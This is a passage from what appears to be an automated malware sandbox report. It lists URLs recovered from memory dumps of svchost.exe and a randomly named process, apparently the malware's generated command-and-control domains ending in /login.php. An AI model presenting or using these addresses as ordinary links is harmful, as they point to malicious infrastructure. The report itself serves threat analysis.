http://qeqyqul.com/login.php
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580949078.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590381869.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582128544.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795088390.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600952988.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582064020.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600106143.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600135684.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600430482.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589646686.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600576251.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600797663.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2666830881.00000000033EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qeqyreq.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658112964.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1636514869.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qeqyrug.com/login.php
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1696068911.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1696189199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693423214.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.000000000127A000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001305000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://qeqysag.com/login.php
Source: svchost.exe, 00000002.00000003.1666672208.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1674611166.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1675004112.000000000CCF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qeqysap.com/login.php
Source: svchost.exe, 00000002.00000003.1629387199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633515874.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1630932773.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1630421381.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632737159.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1873623051.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1872492908.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1629462087.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633198974.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qeqytal.com/login.php
Source: svchost.exe, 00000002.00000003.1681368942.000000000CC50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qeqytuq.com/login.php
Source: svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565950608.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695532230.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qeqyxov.com/
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469750159.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475947519.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1466997109.000000000335C000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.00000000092BD000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.0000000009307000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007F64000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://qeqyxov.com/login.php
Source: svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qetyfuv.com/
Source: svchost.exe, 00000002.00000003.1666672208.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1668142095.00000000033CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qetyfyl.com/login.php
Source: svchost.exe, 00000002.00000003.1884602556.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885626689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1895985913.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885477065.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qetykyq.com/login.php
Source: svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qetylyv.com/
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658112964.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qetyrul.com/login.php
Source: svchost.exe, 00000002.00000003.1876769792.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1951119798.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1958180537.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558796542.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2663518628.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643374628.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699805037.0000000005AF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878814703.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1636514869.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638844020.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1880572377.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1880220703.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qetytav.com/login.php
Source: svchost.exe, 00000002.00000003.2660041223.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1791268726.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2664551045.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694910479.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2666830881.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794886536.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794287273.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661870675.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696169271.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1789782421.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792465812.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qetytug.com/login.php
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565752002.000000000CC12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498635965.00000000008B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567509191.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523218130.00000000032EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565184265.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475543388.000000000335E000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.00000000092BD000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001305000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.000000000143B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qetyvep.com/login.php
Source: svchost.exe, 00000002.00000003.1522565965.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523100959.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651524701.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523366703.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612069881.00000000033FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590472054.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523355053.00000000033D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qetyxiq.com/login.php
Source: svchost.exe, 00000002.00000003.1735890542.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1697918003.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1696068911.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1804173388.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084955856.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824916487.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2082300647.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1696189199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839980751.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693423214.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyfag.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1893123903.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889082302.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1908769113.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649079219.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyfuq.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1951119798.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1958180537.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558796542.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2663518628.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658112964.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641638875.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699805037.0000000005AF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1636514869.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638844020.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyhap.com/login.php
Source: svchost.exe, 00000002.00000003.1685885238.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683417197.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2076266061.0000000005A32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2076877673.0000000005A34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683897508.000000000088E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyhul.com/
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929571849.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1951392830.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708272714.000000000CC51000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667325772.000000000CC12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881921461.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1942895681.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699419339.0000000005A30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889082302.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1908769113.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1808589587.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2707783889.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2666830881.00000000033EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyhuv.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929571849.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1951392830.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881921461.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1942895681.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699419339.0000000005A30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889082302.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1908769113.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1808589587.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1823613650.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyhuv.com/login.phpC:
Source: svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1808589587.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1738011948.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexykaq.com/
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735890542.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1697918003.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565084658.000000000CC58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1804173388.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475968169.0000000000861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498796821.0000000000860000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824916487.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839980751.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475543388.000000000335E000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.000000000127A000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001305000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.00000000013D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexylup.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641581464.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1893123903.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641334873.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641752374.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 